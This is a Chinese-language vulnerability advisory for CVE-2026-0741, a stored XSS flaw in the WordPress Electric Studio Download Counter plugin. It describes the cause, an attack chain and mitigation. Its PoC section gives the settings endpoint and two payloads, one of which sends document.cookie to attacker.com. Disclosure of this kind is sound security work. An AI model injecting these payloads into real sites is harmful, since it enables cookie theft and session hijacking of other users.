CVE-2026-0741 CVSS 4.4 中危

CVE-2026-0741: WordPress Electric Studio Download Counter插件存储型XSS漏洞

披露日期: 2026-01-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0741

漏洞类型

存储型XSS

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Electric Studio Download Counter plugin for WordPress

漏洞概述

Electric Studio Download Counter是WordPress的一个下载计数器插件。该插件在2.4及之前的所有版本中存在的存储型跨站脚本(XSS)漏洞源于对用户输入的安全验证不足。攻击者通过在插件设置中注入恶意脚本代码，由于插件在输出时缺少适当的HTML转义处理，这些恶意代码会被永久存储在数据库中。当其他用户访问包含恶意代码的页面时，攻击脚本就会在其浏览器中执行，可能导致会话劫持、敏感信息窃取或进一步的网络钓鱼攻击。由于漏洞需要管理员级别权限才能利用，这限制了潜在的攻击面，但仍对多用户WordPress环境构成严重安全风险。

技术细节

漏洞源于插件在处理设置参数时未对用户输入进行充分的HTML转义。攻击者可在插件设置页面的特定参数中注入包含JavaScript代码的恶意字符串。该代码随后被存储在WordPress数据库中，并在插件输出相关内容时未经转义直接渲染到HTML页面中。由于WordPress管理员通常拥有较高的信任级别，这类存储型XSS payload可能在管理员不知情的情况下被执行，进而影响所有访问该页面的用户。攻击者可以利用此漏洞窃取管理员cookie、篡改页面内容或进行其他恶意操作。

攻击链分析

STEP 1

步骤1

攻击者以管理员身份登录WordPress后台

STEP 2

步骤2

访问插件设置页面并注入包含XSS payload的恶意参数

STEP 3

步骤3

恶意脚本被存储到数据库中

STEP 4

步骤4

当其他用户访问相关页面时，恶意脚本在其浏览器中执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

POST /wp-admin/options-general.php?page=esdc_settings

参数注入：
download_link=<img src=x onerror=alert(document.cookie)>

或

button_text=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

影响范围

Electric Studio Download Counter plugin for WordPress <= 2.4

防御指南

临时缓解措施

如果无法立即升级，可临时禁用该插件或限制管理员权限账户的创建和修改

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表